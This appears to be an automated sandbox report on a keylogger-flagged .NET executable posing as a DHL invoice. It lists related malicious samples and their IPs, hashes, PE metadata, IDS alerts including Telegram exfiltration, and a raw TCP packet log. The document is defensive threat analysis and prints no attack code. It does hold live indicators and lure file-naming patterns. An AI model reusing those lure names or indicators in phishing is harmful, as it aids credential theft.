	Nuevo pedido de cotizaci#U00f3n 663837 4899272.pdf.exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	132.226.247.73
	sparc.nn.elf	Get hash	malicious	Mirai, Okiru	Browse	132.240.253.211
	x86_32.nn.elf	Get hash	malicious	Mirai, Okiru	Browse	132.244.23.61
	PK241200518-EMAIL RELEASE-pdf.exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	132.226.8.169
	ugpJX5h56S.exe	Get hash	malicious	GuLoader, Snake Keylogger, VIP Keylogger	Browse	132.226.247.73
	hesaphareketi-01.pdf.exe	Get hash	malicious	Snake Keylogger	Browse	132.226.247.73

JA3 Fingerprints

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
54328bd36c14bd82ddaa0c04b25ed9ad	YU SV Payment.exe	Get hash	malicious	MassLogger RAT	Browse	104.21.67.152
	PURCHASE ORDER TRC-090971819130-24_pdf.exe	Get hash	malicious	GuLoader, MassLogger RAT	Browse	104.21.67.152
	PAYMENT ADVICE 750013-1012449943-81347-pdf.exe	Get hash	malicious	GuLoader, MassLogger RAT	Browse	104.21.67.152
	Overheaped237.exe	Get hash	malicious	GuLoader, Snake Keylogger	Browse	104.21.67.152
	HUSDGHCE23ED.exe	Get hash	malicious	MassLogger RAT	Browse	104.21.67.152
	66776676676.exe	Get hash	malicious	GuLoader, Snake Keylogger, VIP Keylogger	Browse	104.21.67.152
	_Company.exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	104.21.67.152
	0001.exe	Get hash	malicious	Snake Keylogger	Browse	104.21.67.152
	Nuevo pedido de cotizaci#U00f3n 663837 4899272.pdf.exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	104.21.67.152
3b5074b1b5d032e5620f69f9f700ff0e	https://p.placed.com/api/v2/sync/impression?partner=barkley&plaid=0063o000014sWgoAAE&version=1.0&payload_campaign_identifier=71700000100870630&payload_timestamp=5943094174221506287&payload_type=impression&redirect=http%3A%2F%2Fgoogle.com%2Famp%2Fs%2Fgoal.com.co%2Fwp%2Fpayment	Get hash	malicious	HTMLPhisher	Browse	149.154.167.220
	file.exe	Get hash	malicious	LummaC, Amadey, LummaC Stealer, PureLog Stealer, RHADAMANTHYS, zgRAT	Browse	149.154.167.220
	ktyihkdfesf.exe	Get hash	malicious	Vidar	Browse	149.154.167.220
	https://kubota.highq.com/kubota/externalAccess.action?linkParam=248Md4JKaxiIU4vwlQaNq5FLgPVNq03doY6pcXaLJD4%3D&documentDownload=link	Get hash	malicious	Unknown	Browse	149.154.167.220
	https://kubota.highq.com/kubota/viewUserProfile.action?metaData.encryptTargetUserID=D1l4_GI3rHw=&metaData.updateUserProfileProcess=true	Get hash	malicious	Unknown	Browse	149.154.167.220
	https://track.samsupport.jmsend.com/z.z?l=aHR0cHM6Ly9zYW1zdXBwb3J0cy1jb20uam1haWxyb3V0ZS5uZXQveC91P3U9ZWJlNTI4YmMtYTNjMS00NjI0LWFmZjEtYzcwNDJmMjczZWIw&r=14771356625&d=20437066&p=1&t=h&h=40dfe9be3647ce867f619b07dd91c655	Get hash	malicious	Unknown	Browse	149.154.167.220
	Employee_Letter.PDFuJPefyDW1j.url	Get hash	malicious	Unknown	Browse	149.154.167.220
	file.exe	Get hash	malicious	ScreenConnect Tool, LummaC, Amadey, Cryptbot, LummaC Stealer, Vidar	Browse	149.154.167.220
	8N8j6QojHn.dll	Get hash	malicious	Unknown	Browse	149.154.167.220

File type:	PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
Entropy (8bit):	5.507163481031452
TrID:	Win32 Executable (generic) Net Framework (10011505/4) 49.83% Win32 Executable (generic) a (10002005/4) 49.78% Generic CIL Executable (.NET, Mono, etc.) (73296/58) 0.36% Generic Win/DOS Executable (2004/3) 0.01% DOS Executable Generic (2002/1) 0.01%
File name:	Invoice DHL - AWB 2024 E4001 - 0000731.exe
File size:	45'056 bytes
MD5:	1147fdf9a4f5f4dcdbdd6c080c88e083
SHA1:	753e81bcdb1750a4cc0d34093fe2cd5f5512d77a
SHA256:	4ec5b3be5d6a5039ec5c725a8da4290f6faf51e744c4b6441c9e625dbe7cc88e
SHA512:	1bcae2918af561663d07fe3ebf1caa7f4d921185b8cf62ee93e70c7df6142cd07163eaf50000d6b516b9215aee09d04b9f5a579fcd5f655895d0ffd5ede534b7
SSDEEP:	768:1IVFJHupNktBnTqwCRMrhmwpdueYN2/JRFHvOrogqT1Udf18KUknBAJ7:1IFHupNkvTqw2ghmwHYNchvO8gq6fVUt
TLSH:	7713E657F51103F0FDB99B71382B0C1A0E9B7E7EE8F16A5D28DDB13613B32A1005A95A
File Content Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...l.dg.............................-... ...@....@.. ....................................`................................

File Icon


Icon Hash:	1991d90d09491365

Static PE Info

General

Entrypoint:	0x402d8e
Entrypoint Section:	.text
Digitally signed:	false
Imagebase:	0x400000
Subsystem:	windows gui
Image File Characteristics:	EXECUTABLE_IMAGE, 32BIT_MACHINE
DLL Characteristics:	HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
Time Stamp:	0x6764CC6C [Fri Dec 20 01:46:20 2024 UTC]
TLS Callbacks:
CLR (.Net) Version:
OS Version Major:	4
OS Version Minor:	0
File Version Major:	4
File Version Minor:	0
Subsystem Version Major:	4
Subsystem Version Minor:	0
Import Hash:	f34d5f2d4577ed6d9ceec516c1f5a744

Entrypoint Preview

Instruction
jmp dword ptr [00402000h]
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al

Data Directories

Name	Virtual Address	Virtual Size	Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IMPORT	0x2d34	0x57	.text
IMAGE_DIRECTORY_ENTRY_RESOURCE	0x4000	0x9c1a	.rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION	0x0	0x0
IMAGE_DIRECTORY_ENTRY_SECURITY	0x0	0x0
IMAGE_DIRECTORY_ENTRY_BASERELOC	0xe000	0xc	.reloc
IMAGE_DIRECTORY_ENTRY_DEBUG	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COPYRIGHT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_GLOBALPTR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_TLS	0x0	0x0
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG	0x0	0x0
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IAT	0x2000	0x8	.text
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR	0x2008	0x48	.text
IMAGE_DIRECTORY_ENTRY_RESERVED	0x0	0x0

Sections

Name	Virtual Address	Virtual Size	Raw Size	MD5	Xored PE	ZLIB Complexity	File Type	Entropy	Characteristics
.text	0x2000	0xd94	0xe00	7837e1219d777ebbc2bd2b6f730f47bd	False	0.5811941964285714	data	5.345215092991625	IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
.rsrc	0x4000	0x9c1a	0x9e00	93e5f49ae4bccb97a4b39d883dad5ba8	False	0.4762410996835443	data	5.283635760508314	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.reloc	0xe000	0xc	0x200	608cbd224fd48e75a08ec7eae47e4160	False	0.044921875	data	0.08153941234324169	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ

Resources

Name	RVA	Size	Type	ZLIB Complexity
RT_ICON	0x4130	0x94a8	Device independent bitmap graphic, 96 x 192 x 32, image size 36864, resolution 39 x 39 px/m	0.47947761194029853
RT_GROUP_ICON	0xd5d8	0x14	data	1.15
RT_VERSION	0xd5ec	0x444	data	0.39377289377289376
RT_MANIFEST	0xda30	0x1ea	XML 1.0 document, Unicode text, UTF-8 (with BOM) text, with CRLF line terminators	0.5489795918367347

Imports

DLL	Import
mscoree.dll	_CorExeMain

Network Behavior

Suricata IDS Alerts

Timestamp	SID	Signature	Severity	Source IP	Source Port	Dest IP	Dest Port	Protocol
2024-12-20T10:22:38.842172+0100	2803274	ETPRO MALWARE Common Downloader Header Pattern UH	2	192.168.2.4	49737	132.226.247.73	80	TCP
2024-12-20T10:22:41.170332+0100	2803274	ETPRO MALWARE Common Downloader Header Pattern UH	2	192.168.2.4	49737	132.226.247.73	80	TCP
2024-12-20T10:22:42.787363+0100	2803305	ETPRO MALWARE Common Downloader Header Pattern H	3	192.168.2.4	49739	104.21.67.152	443	TCP
2024-12-20T10:22:44.264063+0100	2803274	ETPRO MALWARE Common Downloader Header Pattern UH	2	192.168.2.4	49740	132.226.247.73	80	TCP
2024-12-20T10:23:09.381203+0100	2853006	ETPRO MALWARE Snake Keylogger Telegram Exfil	1	192.168.2.4	49769	149.154.167.220	443	TCP

Network Port Distribution

TCP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Dec 20, 2024 10:22:01.474910975 CET	49730	80	192.168.2.4	160.22.121.182
Dec 20, 2024 10:22:01.595139980 CET	80	49730	160.22.121.182	192.168.2.4
Dec 20, 2024 10:22:01.595232964 CET	49730	80	192.168.2.4	160.22.121.182
Dec 20, 2024 10:22:01.595963955 CET	49730	80	192.168.2.4	160.22.121.182
Dec 20, 2024 10:22:01.715909004 CET	80	49730	160.22.121.182	192.168.2.4
Dec 20, 2024 10:22:03.186876059 CET	80	49730	160.22.121.182	192.168.2.4
Dec 20, 2024 10:22:03.186894894 CET	80	49730	160.22.121.182	192.168.2.4
Dec 20, 2024 10:22:03.186903954 CET	80	49730	160.22.121.182	192.168.2.4
Dec 20, 2024 10:22:03.186975002 CET	49730	80	192.168.2.4	160.22.121.182
Dec 20, 2024 10:22:03.187035084 CET	80	49730	160.22.121.182	192.168.2.4
Dec 20, 2024 10:22:03.187047005 CET	80	49730	160.22.121.182	192.168.2.4
Dec 20, 2024 10:22:03.187086105 CET	49730	80	192.168.2.4	160.22.121.182
Dec 20, 2024 10:22:03.439441919 CET	80	49730	160.22.121.182	192.168.2.4
Dec 20, 2024 10:22:03.439508915 CET	80	49730	160.22.121.182	192.168.2.4
Dec 20, 2024 10:22:03.439527035 CET	80	49730	160.22.121.182	192.168.2.4
Dec 20, 2024 10:22:03.439560890 CET	49730	80	192.168.2.4	160.22.121.182
Dec 20, 2024 10:22:03.439599991 CET	80	49730	160.22.121.182	192.168.2.4
Dec 20, 2024 10:22:03.439642906 CET	49730	80	192.168.2.4	160.22.121.182
Dec 20, 2024 10:22:03.559010983 CET	80	49730	160.22.121.182	192.168.2.4
Dec 20, 2024 10:22:03.559022903 CET	80	49730	160.22.121.182	192.168.2.4
Dec 20, 2024 10:22:03.559032917 CET	80	49730	160.22.121.182	192.168.2.4
Dec 20, 2024 10:22:03.559041977 CET	80	49730	160.22.121.182	192.168.2.4
Dec 20, 2024 10:22:03.559051991 CET	80	49730	160.22.121.182	192.168.2.4
Dec 20, 2024 10:22:03.559062004 CET	80	49730	160.22.121.182	192.168.2.4
Dec 20, 2024 10:22:03.559086084 CET	49730	80	192.168.2.4	160.22.121.182
Dec 20, 2024 10:22:03.559118032 CET	49730	80	192.168.2.4	160.22.121.182
Dec 20, 2024 10:22:03.692631960 CET	80	49730	160.22.121.182	192.168.2.4
Dec 20, 2024 10:22:03.692691088 CET	80	49730	160.22.121.182	192.168.2.4
Dec 20, 2024 10:22:03.692749023 CET	49730	80	192.168.2.4	160.22.121.182
Dec 20, 2024 10:22:03.696589947 CET	80	49730	160.22.121.182	192.168.2.4
Dec 20, 2024 10:22:03.698149920 CET	80	49730	160.22.121.182	192.168.2.4
Dec 20, 2024 10:22:03.698196888 CET	49730	80	192.168.2.4	160.22.121.182
Dec 20, 2024 10:22:03.698260069 CET	80	49730	160.22.121.182	192.168.2.4
Dec 20, 2024 10:22:03.706669092 CET	80	49730	160.22.121.182	192.168.2.4
Dec 20, 2024 10:22:03.706726074 CET	49730	80	192.168.2.4	160.22.121.182
Dec 20, 2024 10:22:03.706758022 CET	80	49730	160.22.121.182	192.168.2.4
Dec 20, 2024 10:22:03.714926958 CET	80	49730	160.22.121.182	192.168.2.4
Dec 20, 2024 10:22:03.714967966 CET	49730	80	192.168.2.4	160.22.121.182
Dec 20, 2024 10:22:03.714989901 CET	80	49730	160.22.121.182	192.168.2.4
Dec 20, 2024 10:22:03.723368883 CET	80	49730	160.22.121.182	192.168.2.4
Dec 20, 2024 10:22:03.723421097 CET	49730	80	192.168.2.4	160.22.121.182
Dec 20, 2024 10:22:03.723455906 CET	80	49730	160.22.121.182	192.168.2.4
Dec 20, 2024 10:22:03.731745005 CET	80	49730	160.22.121.182	192.168.2.4
Dec 20, 2024 10:22:03.731792927 CET	49730	80	192.168.2.4	160.22.121.182
Dec 20, 2024 10:22:03.731837034 CET	80	49730	160.22.121.182	192.168.2.4
Dec 20, 2024 10:22:03.740361929 CET	80	49730	160.22.121.182	192.168.2.4
Dec 20, 2024 10:22:03.740417004 CET	49730	80	192.168.2.4	160.22.121.182
Dec 20, 2024 10:22:03.884501934 CET	80	49730	160.22.121.182	192.168.2.4
Dec 20, 2024 10:22:03.935726881 CET	49730	80	192.168.2.4	160.22.121.182
Dec 20, 2024 10:22:03.945499897 CET	80	49730	160.22.121.182	192.168.2.4
Dec 20, 2024 10:22:03.945611954 CET	80	49730	160.22.121.182	192.168.2.4
Dec 20, 2024 10:22:03.945677996 CET	49730	80	192.168.2.4	160.22.121.182
Dec 20, 2024 10:22:03.949630022 CET	80	49730	160.22.121.182	192.168.2.4
Dec 20, 2024 10:22:03.949757099 CET	80	49730	160.22.121.182	192.168.2.4
Dec 20, 2024 10:22:03.949811935 CET	49730	80	192.168.2.4	160.22.121.182
Dec 20, 2024 10:22:03.958033085 CET	80	49730	160.22.121.182	192.168.2.4
Dec 20, 2024 10:22:03.958122015 CET	80	49730	160.22.121.182	192.168.2.4
Dec 20, 2024 10:22:03.958179951 CET	49730	80	192.168.2.4	160.22.121.182
Dec 20, 2024 10:22:03.966011047 CET	80	49730	160.22.121.182	192.168.2.4
Dec 20, 2024 10:22:03.966133118 CET	80	49730	160.22.121.182	192.168.2.4
Dec 20, 2024 10:22:03.966195107 CET	49730	80	192.168.2.4	160.22.121.182
Dec 20, 2024 10:22:03.974462032 CET	80	49730	160.22.121.182	192.168.2.4
Dec 20, 2024 10:22:03.974627972 CET	80	49730	160.22.121.182	192.168.2.4
Dec 20, 2024 10:22:03.974678993 CET	49730	80	192.168.2.4	160.22.121.182
Dec 20, 2024 10:22:03.982743025 CET	80	49730	160.22.121.182	192.168.2.4
Dec 20, 2024 10:22:03.982820988 CET	80	49730	160.22.121.182	192.168.2.4
Dec 20, 2024 10:22:03.982868910 CET	49730	80	192.168.2.4	160.22.121.182
Dec 20, 2024 10:22:03.991139889 CET	80	49730	160.22.121.182	192.168.2.4
Dec 20, 2024 10:22:03.991272926 CET	80	49730	160.22.121.182	192.168.2.4
Dec 20, 2024 10:22:03.991363049 CET	49730	80	192.168.2.4	160.22.121.182
Dec 20, 2024 10:22:03.999938965 CET	80	49730	160.22.121.182	192.168.2.4
Dec 20, 2024 10:22:04.000045061 CET	80	49730	160.22.121.182	192.168.2.4
Dec 20, 2024 10:22:04.000091076 CET	49730	80	192.168.2.4	160.22.121.182
Dec 20, 2024 10:22:04.008230925 CET	80	49730	160.22.121.182	192.168.2.4
Dec 20, 2024 10:22:04.008285999 CET	80	49730	160.22.121.182	192.168.2.4
Dec 20, 2024 10:22:04.008352041 CET	49730	80	192.168.2.4	160.22.121.182
Dec 20, 2024 10:22:04.016277075 CET	80	49730	160.22.121.182	192.168.2.4
Dec 20, 2024 10:22:04.060709953 CET	49730	80	192.168.2.4	160.22.121.182
Dec 20, 2024 10:22:04.198570967 CET	80	49730	160.22.121.182	192.168.2.4
Dec 20, 2024 10:22:04.198653936 CET	80	49730	160.22.121.182	192.168.2.4
Dec 20, 2024 10:22:04.198713064 CET	49730	80	192.168.2.4	160.22.121.182
Dec 20, 2024 10:22:04.202752113 CET	80	49730	160.22.121.182	192.168.2.4
Dec 20, 2024 10:22:04.202848911 CET	80	49730	160.22.121.182	192.168.2.4
Dec 20, 2024 10:22:04.202898026 CET	49730	80	192.168.2.4	160.22.121.182
Dec 20, 2024 10:22:04.211083889 CET	80	49730	160.22.121.182	192.168.2.4
Dec 20, 2024 10:22:04.214158058 CET	80	49730	160.22.121.182	192.168.2.4
Dec 20, 2024 10:22:04.214206934 CET	49730	80	192.168.2.4	160.22.121.182
Dec 20, 2024 10:22:04.214272022 CET	80	49730	160.22.121.182	192.168.2.4
Dec 20, 2024 10:22:04.222582102 CET	80	49730	160.22.121.182	192.168.2.4
Dec 20, 2024 10:22:04.222634077 CET	49730	80	192.168.2.4	160.22.121.182
Dec 20, 2024 10:22:04.222724915 CET	80	49730	160.22.121.182	192.168.2.4
Dec 20, 2024 10:22:04.231287956 CET	80	49730	160.22.121.182	192.168.2.4
Dec 20, 2024 10:22:04.231348038 CET	49730	80	192.168.2.4	160.22.121.182
Dec 20, 2024 10:22:04.231381893 CET	80	49730	160.22.121.182	192.168.2.4
Dec 20, 2024 10:22:04.239399910 CET	80	49730	160.22.121.182	192.168.2.4
Dec 20, 2024 10:22:04.239458084 CET	49730	80	192.168.2.4	160.22.121.182
Dec 20, 2024 10:22:04.239499092 CET	80	49730	160.22.121.182	192.168.2.4
Dec 20, 2024 10:22:04.247646093 CET	80	49730	160.22.121.182	192.168.2.4
Dec 20, 2024 10:22:04.247694969 CET	49730	80	192.168.2.4	160.22.121.182
Dec 20, 2024 10:22:04.247731924 CET	80	49730	160.22.121.182	192.168.2.4
Dec 20, 2024 10:22:04.256071091 CET	80	49730	160.22.121.182	192.168.2.4
Dec 20, 2024 10:22:04.256136894 CET	49730	80	192.168.2.4	160.22.121.182
Dec 20, 2024 10:22:04.256167889 CET	80	49730	160.22.121.182	192.168.2.4
Dec 20, 2024 10:22:04.264419079 CET	80	49730	160.22.121.182	192.168.2.4
Dec 20, 2024 10:22:04.264473915 CET	49730	80	192.168.2.4	160.22.121.182
Dec 20, 2024 10:22:04.264616013 CET	80	49730	160.22.121.182	192.168.2.4
Dec 20, 2024 10:22:04.272764921 CET	80	49730	160.22.121.182	192.168.2.4
Dec 20, 2024 10:22:04.272811890 CET	49730	80	192.168.2.4	160.22.121.182
Dec 20, 2024 10:22:04.272859097 CET	80	49730	160.22.121.182	192.168.2.4
Dec 20, 2024 10:22:04.281244993 CET	80	49730	160.22.121.182	192.168.2.4
Dec 20, 2024 10:22:04.281320095 CET	49730	80	192.168.2.4	160.22.121.182
Dec 20, 2024 10:22:04.281323910 CET	80	49730	160.22.121.182	192.168.2.4
Dec 20, 2024 10:22:04.289597988 CET	80	49730	160.22.121.182	192.168.2.4
Dec 20, 2024 10:22:04.289647102 CET	49730	80	192.168.2.4	160.22.121.182
Dec 20, 2024 10:22:04.289834976 CET	80	49730	160.22.121.182	192.168.2.4
Dec 20, 2024 10:22:04.297924042 CET	80	49730	160.22.121.182	192.168.2.4
Dec 20, 2024 10:22:04.297977924 CET	49730	80	192.168.2.4	160.22.121.182
Dec 20, 2024 10:22:04.298037052 CET	80	49730	160.22.121.182	192.168.2.4
Dec 20, 2024 10:22:04.306348085 CET	80	49730	160.22.121.182	192.168.2.4
Dec 20, 2024 10:22:04.306400061 CET	49730	80	192.168.2.4	160.22.121.182
Dec 20, 2024 10:22:04.306404114 CET	80	49730	160.22.121.182	192.168.2.4
Dec 20, 2024 10:22:04.314682961 CET	80	49730	160.22.121.182	192.168.2.4
Dec 20, 2024 10:22:04.314743042 CET	49730	80	192.168.2.4	160.22.121.182
Dec 20, 2024 10:22:04.314754963 CET	80	49730	160.22.121.182	192.168.2.4
Dec 20, 2024 10:22:04.323031902 CET	80	49730	160.22.121.182	192.168.2.4
Dec 20, 2024 10:22:04.323070049 CET	80	49730	160.22.121.182	192.168.2.4
Dec 20, 2024 10:22:04.323112011 CET	49730	80	192.168.2.4	160.22.121.182
Dec 20, 2024 10:22:04.373322010 CET	49730	80	192.168.2.4	160.22.121.182
Dec 20, 2024 10:22:04.451740026 CET	80	49730	160.22.121.182	192.168.2.4
Dec 20, 2024 10:22:04.451931953 CET	80	49730	160.22.121.182	192.168.2.4
Dec 20, 2024 10:22:04.454366922 CET	80	49730	160.22.121.182	192.168.2.4
Dec 20, 2024 10:22:04.454442978 CET	49730	80	192.168.2.4	160.22.121.182
Dec 20, 2024 10:22:04.454493046 CET	80	49730	160.22.121.182	192.168.2.4
Dec 20, 2024 10:22:04.454555988 CET	49730	80	192.168.2.4	160.22.121.182
Dec 20, 2024 10:22:04.459805012 CET	80	49730	160.22.121.182	192.168.2.4
Dec 20, 2024 10:22:04.459908962 CET	80	49730	160.22.121.182	192.168.2.4
Dec 20, 2024 10:22:04.459975004 CET	49730	80	192.168.2.4	160.22.121.182
Dec 20, 2024 10:22:04.465112925 CET	80	49730	160.22.121.182	192.168.2.4
Dec 20, 2024 10:22:04.465182066 CET	80	49730	160.22.121.182	192.168.2.4
Dec 20, 2024 10:22:04.465239048 CET	49730	80	192.168.2.4	160.22.121.182
Dec 20, 2024 10:22:04.470400095 CET	80	49730	160.22.121.182	192.168.2.4
Dec 20, 2024 10:22:04.470514059 CET	80	49730	160.22.121.182	192.168.2.4
Dec 20, 2024 10:22:04.470588923 CET	49730	80	192.168.2.4	160.22.121.182
Dec 20, 2024 10:22:04.475786924 CET	80	49730	160.22.121.182	192.168.2.4
Dec 20, 2024 10:22:04.475873947 CET	80	49730	160.22.121.182	192.168.2.4
Dec 20, 2024 10:22:04.475934029 CET	49730	80	192.168.2.4	160.22.121.182
Dec 20, 2024 10:22:04.481163979 CET	80	49730	160.22.121.182	192.168.2.4
Dec 20, 2024 10:22:04.481266022 CET	80	49730	160.22.121.182	192.168.2.4
Dec 20, 2024 10:22:04.481319904 CET	49730	80	192.168.2.4	160.22.121.182
Dec 20, 2024 10:22:04.486443043 CET	80	49730	160.22.121.182	192.168.2.4
Dec 20, 2024 10:22:04.486490011 CET	80	49730	160.22.121.182	192.168.2.4
Dec 20, 2024 10:22:04.486558914 CET	49730	80	192.168.2.4	160.22.121.182
Dec 20, 2024 10:22:04.491821051 CET	80	49730	160.22.121.182	192.168.2.4
Dec 20, 2024 10:22:04.491924047 CET	80	49730	160.22.121.182	192.168.2.4
Dec 20, 2024 10:22:04.491976023 CET	49730	80	192.168.2.4	160.22.121.182
Dec 20, 2024 10:22:04.497194052 CET	80	49730	160.22.121.182	192.168.2.4
Dec 20, 2024 10:22:04.497307062 CET	80	49730	160.22.121.182	192.168.2.4
Dec 20, 2024 10:22:04.497356892 CET	49730	80	192.168.2.4	160.22.121.182
Dec 20, 2024 10:22:04.502860069 CET	80	49730	160.22.121.182	192.168.2.4
Dec 20, 2024 10:22:04.502933025 CET	80	49730	160.22.121.182	192.168.2.4
Dec 20, 2024 10:22:04.502995968 CET	49730	80	192.168.2.4	160.22.121.182
Dec 20, 2024 10:22:04.507814884 CET	80	49730	160.22.121.182	192.168.2.4
Dec 20, 2024 10:22:04.507968903 CET	80	49730	160.22.121.182	192.168.2.4
Dec 20, 2024 10:22:04.508021116 CET	49730	80	192.168.2.4	160.22.121.182
Dec 20, 2024 10:22:04.513283014 CET	80	49730	160.22.121.182	192.168.2.4
Dec 20, 2024 10:22:04.513336897 CET	80	49730	160.22.121.182	192.168.2.4
Dec 20, 2024 10:22:04.513390064 CET	49730	80	192.168.2.4	160.22.121.182
Dec 20, 2024 10:22:04.518471003 CET	80	49730	160.22.121.182	192.168.2.4
Dec 20, 2024 10:22:04.518663883 CET	80	49730	160.22.121.182	192.168.2.4
Dec 20, 2024 10:22:04.520953894 CET	49730	80	192.168.2.4	160.22.121.182
Dec 20, 2024 10:22:04.523818016 CET	80	49730	160.22.121.182	192.168.2.4
Dec 20, 2024 10:22:04.523930073 CET	80	49730	160.22.121.182	192.168.2.4
Dec 20, 2024 10:22:04.524662018 CET	49730	80	192.168.2.4	160.22.121.182
Dec 20, 2024 10:22:04.529158115 CET	80	49730	160.22.121.182	192.168.2.4
Dec 20, 2024 10:22:04.529263020 CET	80	49730	160.22.121.182	192.168.2.4
Dec 20, 2024 10:22:04.534518003 CET	80	49730	160.22.121.182	192.168.2.4
Dec 20, 2024 10:22:04.534542084 CET	49730	80	192.168.2.4	160.22.121.182
Dec 20, 2024 10:22:04.534634113 CET	80	49730	160.22.121.182	192.168.2.4
Dec 20, 2024 10:22:04.538527966 CET	49730	80	192.168.2.4	160.22.121.182
Dec 20, 2024 10:22:04.540021896 CET	80	49730	160.22.121.182	192.168.2.4
Dec 20, 2024 10:22:04.540162086 CET	80	49730	160.22.121.182	192.168.2.4
Dec 20, 2024 10:22:04.541166067 CET	49730	80	192.168.2.4	160.22.121.182
Dec 20, 2024 10:22:04.545583010 CET	80	49730	160.22.121.182	192.168.2.4
Dec 20, 2024 10:22:04.545670986 CET	80	49730	160.22.121.182	192.168.2.4
Dec 20, 2024 10:22:04.550534964 CET	49730	80	192.168.2.4	160.22.121.182
Dec 20, 2024 10:22:04.550539017 CET	80	49730	160.22.121.182	192.168.2.4
Dec 20, 2024 10:22:04.550605059 CET	80	49730	160.22.121.182	192.168.2.4
Dec 20, 2024 10:22:04.554534912 CET	49730	80	192.168.2.4	160.22.121.182
Dec 20, 2024 10:22:04.555891991 CET	80	49730	160.22.121.182	192.168.2.4
Dec 20, 2024 10:22:04.555996895 CET	80	49730	160.22.121.182	192.168.2.4
Dec 20, 2024 10:22:04.558531046 CET	49730	80	192.168.2.4	160.22.121.182
Dec 20, 2024 10:22:04.561188936 CET	80	49730	160.22.121.182	192.168.2.4
Dec 20, 2024 10:22:04.561323881 CET	80	49730	160.22.121.182	192.168.2.4
Dec 20, 2024 10:22:04.561377048 CET	49730	80	192.168.2.4	160.22.121.182
Dec 20, 2024 10:22:04.566560030 CET	80	49730	160.22.121.182	192.168.2.4
Dec 20, 2024 10:22:04.566664934 CET	80	49730	160.22.121.182	192.168.2.4
Dec 20, 2024 10:22:04.566724062 CET	49730	80	192.168.2.4	160.22.121.182
Dec 20, 2024 10:22:04.571837902 CET	80	49730	160.22.121.182	192.168.2.4
Dec 20, 2024 10:22:04.623204947 CET	49730	80	192.168.2.4	160.22.121.182
Dec 20, 2024 10:22:04.705152988 CET	80	49730	160.22.121.182	192.168.2.4
Dec 20, 2024 10:22:04.705291986 CET	80	49730	160.22.121.182	192.168.2.4
Dec 20, 2024 10:22:04.705382109 CET	49730	80	192.168.2.4	160.22.121.182
Dec 20, 2024 10:22:04.706852913 CET	80	49730	160.22.121.182	192.168.2.4
Dec 20, 2024 10:22:04.706964970 CET	80	49730	160.22.121.182	192.168.2.4
Dec 20, 2024 10:22:04.707034111 CET	49730	80	192.168.2.4	160.22.121.182
Dec 20, 2024 10:22:04.710664034 CET	80	49730	160.22.121.182	192.168.2.4
Dec 20, 2024 10:22:04.710746050 CET	80	49730	160.22.121.182	192.168.2.4
Dec 20, 2024 10:22:04.710808039 CET	49730	80	192.168.2.4	160.22.121.182
Dec 20, 2024 10:22:04.714283943 CET	80	49730	160.22.121.182	192.168.2.4
